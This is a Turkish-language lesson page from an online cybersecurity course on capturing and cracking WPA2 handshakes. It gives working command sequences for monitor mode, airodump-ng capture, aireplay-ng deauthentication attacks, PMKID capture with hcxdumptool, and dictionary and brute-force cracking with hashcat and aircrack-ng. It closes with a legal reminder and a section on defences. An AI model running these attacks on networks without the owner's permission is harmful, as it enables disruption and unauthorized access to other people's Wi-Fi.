Cyber Security Academy · Ders

WPA2 El Sıkışmasını Yakalama ve Kırma

aircrack-ng ile dört aşamalı el sıkışmasını yakalayın ve Hashcat ile sözlük saldırılarını deneyin.

2. ders / 413 adım

WPA2 El Sıkışmasını Yakalama ve Kırma, CoddyKit'te ücretsiz bir Cyber Security Academy dersidir. Bu, 4 dersinin 2. dersidir. Aşağıdan dersin tamamını ücretsiz okuyabilir, sonra tarayıcıda yerleşik kod editörü ve 7/24 yapay zeka koçu ile uygulamalı olarak pratik yapabilirsin. Bu, Cyber Security Academy öğrenme yolunun bir parçasıdır ve ilerlemeniz web ve CoddyKit uygulaması arasında senkronize olur. Cyber Security Academy kursu toplamda 4 dersten oluşur.

4 Aşamalı El Sıkışması

Bir istemci WPA2 ağına bağlandığında 4 aşamalı el sıkışması, PMK'den (PSK'den türetilir) ve rastgele tek kullanımlık değerlerden Pairwise Transient Key'i (PTK) türetir. Bu el sıkışmasının yakalanması, çevrimdışı parola kırmayı mümkün kılar.

İzleme Modunu Ayarlama

İzleme modu, kablosuz kartın hedefine bakılmaksızın tüm çerçeveleri yakalamasını sağlar; pasif el sıkışması yakalama için gereklidir. Yalnızca izleme modunu destekleyen kartlarla çalışır.

# Check wireless interface
iwconfig

# Enable monitor mode
sudo airmon-ng start wlan0
# Creates: wlan0mon

# Kill interfering processes first:
sudo airmon-ng check kill

Pasif El Sıkışması Yakalama

Airodump-ng çerçeveleri pasif olarak yakalar. Bir istemcinin doğal biçimde bağlanmasını bekleyin veya kimlik doğrulama sonlandırması yoluyla yeniden bağlanmaya zorlayın. El sıkışmasının yakalandığı bilgisi airodump çıktısının sağ üst köşesinde gösterilir.

# Scan for networks
sudo airodump-ng wlan0mon

# Target a specific AP (replace values)
sudo airodump-ng -c 6 \
  --bssid AA:BB:CC:DD:EE:FF \
  -w handshake_capture \
  wlan0mon

# Top right shows: WPA handshake: AA:BB:...

Kimlik Doğrulama Sonlandırma Saldırısı

Sahte kimlik doğrulama sonlandırma çerçeveleri göndermek, bağlı istemcilerin bağlantısını kesip yeniden bağlanmasını ve böylece yeni bir el sıkışmasının yakalanmasını sağlar. Bu yöntem gürültülüdür, tespit edilebilir ve istemcinin erişim menzili içinde olmasını gerektirir.

# Send deauth frames (authorized labs only)
sudo aireplay-ng -0 5 \
  -a AA:BB:CC:DD:EE:FF \
  -c CC:DD:EE:FF:00:11 \
  wlan0mon

# -0 5 = send 5 deauth frames
# -a = AP MAC
# -c = client MAC (or omit for broadcast)

PMKID Saldırısı: İstemci Gerekmez

PMKID saldırısı (hcxdumptool), bağlı bir istemci gerektirmeden işaret veya arama çerçevelerinden PMKID'yi yakalar. Elde edilmesi daha hızlıdır ve tam el sıkışma kadar kolay kırılabilir.

# Capture PMKID
hcxdumptool -i wlan0mon --enable_status=1 \
  -o pmkid.pcapng

# Convert for Hashcat
hcxpcapngtool -o hash.hc22000 pmkid.pcapng

# Crack with Hashcat mode 22000
hashcat -m 22000 hash.hc22000 rockyou.txt

Hashcat ile El Sıkışmasını Kırma

Yakalama dosyasını dönüştürün ve Hashcat ile 22000 modunu (birleşik WPA2 biçimi) veya 2500 modunu (eski biçim) kullanarak saldırı gerçekleştirin. En iyi sonuçlar için rockyou.txt dosyasını kural kümeleriyle birlikte kullanın.

# Convert pcap to Hashcat format
hcxpcapngtool -o hash.hc22000 handshake_capture-01.cap

# Crack with dictionary
hashcat -m 22000 hash.hc22000 rockyou.txt

# With rules
hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule

# Brute force (short passwords)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d

Aircrack-ng ile Kırma

Aircrack-ng, WPA2 kırma işlemini doğrudan yakalama dosyasından CPU tabanlı olarak gerçekleştirir. Hashcat GPU kırmasından daha yavaştır, ancak biçim dönüştürme gerektirmez.

# Crack with aircrack-ng
aircrack-ng -w rockyou.txt handshake_capture-01.cap

# With multiple wordlists:
aircrack-ng -w wordlist1.txt,wordlist2.txt capture-01.cap

Kelime Listesi Stratejisi

WPA2 parola kırma başarısı tamamen kelime listesinin kalitesine bağlıdır. Şunları kullanın: temel olarak rockyou.txt, değişiklikler için Hashcat kural kümeleri, şirkete özgü kelime listeleri (ad+yıl+sembolü) ve OSINT'ten elde edilen hedefli listeler.

Kırma Süresinin Gerçekliği

20 veya daha fazla karakterden oluşan rastgele bir WPA2 parolasını kırmak hesaplama açısından uygulanabilir değildir. Kırma yalnızca kısa veya sözlük tabanlı parolalara karşı pratiktir. Bu nedenle parola uzunluğu ve rastgelelik, karmaşıklık kurallarından daha önemlidir.

Savunmalar

WPA3-SAE kullanın (çevrimdışı sözlük saldırılarına karşı bağışıktır) veya 20 ya da daha fazla karakterden oluşan rastgele bir parola ifadesine sahip WPA2 kullanın; ayrıca parolalar yerine sertifikalar kullanan EAP-TLS özellikli WPA2-Enterprise'ı tercih edin.

Yasal Hatırlatma

Sahibi olmadığınız ağlarda WPA2 el sıkışmalarını yakalamak yasa dışıdır. Buradaki tüm teknikler yalnızca kendi sınama ağlarınıza veya yetkili laboratuvar ortamlarına (ör. ev laboratuvarı ya da özel sınama erişim noktası) uygulanabilir.

Hızlı Kontrol

PMKID saldırısı, standart el sıkışması yakalamaya göre neyi iyileştirir?

Özet: WPA2 Kırma

Bir WPA2 el sıkışmasını veya PMKID'yi yakalamak, Wi-Fi kırma işlemini çevrimdışı bir sözlük saldırısına dönüştürür. Başarı tamamen parolanın gücüne bağlıdır: kısa ve sözlük tabanlı parolalar hızla kırılır; uzun ve rastgele parolaların kırılması pratikte mümkün değildir. WPA3-SAE, güçlü parola ifadeleri ve kurumsal ağlar için WPA2-Enterprise kullanarak savunma sağlayın.

Başlamak ücretsiz

Yapay zeka eğitmeniyle Cyber Security Academy öğren — ücretsiz

Tarayıcında gerçek kod yaz ve çalıştır, 7/24 yapay zeka eğitmeninden anında yardım al; web'de ya da uygulamada kaldığın yerden devam et.

Kurslar
76
Dersler
303

Sıkça Sorulan Sorular

“WPA2 El Sıkışmasını Yakalama ve Kırma” dersi ücretsiz mi?

Evet — “WPA2 El Sıkışmasını Yakalama ve Kırma” dersin tüm metni burada web'de ücretsiz olarak okunabilir. Etkileşimli olarak pratik yapmak (yerleşik kod editörü ve 7/24 yapay zeka koçu) ve Cyber Security Academy kursunun geri kalanını açmak için CoddyKit PRO'ya yükselt. Cyber Security Academy kursu toplamda 4 dersten oluşur.

“WPA2 El Sıkışmasını Yakalama ve Kırma” dersinde ne öğreneceğim?

aircrack-ng ile dört aşamalı el sıkışmasını yakalayın ve Hashcat ile sözlük saldırılarını deneyin. Cyber Security Academy ile uygulamalı kodu tarayıcıda doğrudan çalıştırarak pratik yaparsın ve 7/24 yapay zeka koçu dersi çalışırken sorularını yanıtlar.

Cyber Security Academy öğrenmeye başlamak için deneyim gerekli mi?

Önceden deneyim gerekmez. CoddyKit'te Cyber Security Academy, başlangıçtan ileri seviyeye kadar yapılandırıldığı için buradan başlayabilir veya başından başlayıp kendi hızında ilerleme yapabilirsin. Bu, 4 dersinin 2. dersidir.

“WPA2 El Sıkışmasını Yakalama ve Kırma” dersi ne kadar sürer?

Çoğu CoddyKit dersi yaklaşık 5–10 dakika sürer. Her biri kısa ve etkileşimli olduğu için sabit ilerleme yaparsın ve web ile uygulama arasında tam olarak bıraktığın yerden devam edebilirsin.

Bu Cyber Security Academy dersinde kod yazıp çalıştırabilir miyim?

Evet. Her Cyber Security Academy dersi yerleşik bir kod editörü içerir, bu sayede tarayıcıda gerçek kod yazıp çalıştırabilir ve anlık yapay zeka geri bildirimi alırsın — yerel kurulum gerekli değildir.

Bu kursun tüm dersleri

  1. 802.11 Güvenlik Protokolleri: WEP, WPA2, WPA3
  2. WPA2 El Sıkışmasını Yakalama ve Kırma
  3. Evil Twin ve Captive Portal Saldırıları
  4. Kurumsal Wi-Fi: EAP ve RADIUS
← Cyber Security Academy Sayfasına Dön